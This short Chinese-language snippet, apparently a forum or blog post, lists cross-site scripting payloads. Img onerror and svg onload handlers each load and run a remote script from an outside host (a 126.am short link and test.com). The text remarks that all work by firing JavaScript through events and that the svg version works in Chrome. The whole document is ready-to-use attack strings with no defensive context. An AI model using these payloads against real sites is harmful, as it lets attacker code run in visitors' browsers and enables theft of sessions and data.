<img src=x onerror=document.body.appendChild(createElement('script')).src='http://126.am/ia8Vp4'>

onerror="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"

原理差不多，都是通过事件调用js，第一个更短些~

chrome 下也可以通过<svg> 标签搞定，

<svg/onload=appendChild(createElement('script')).src='http://126.am/ia8Vp4'>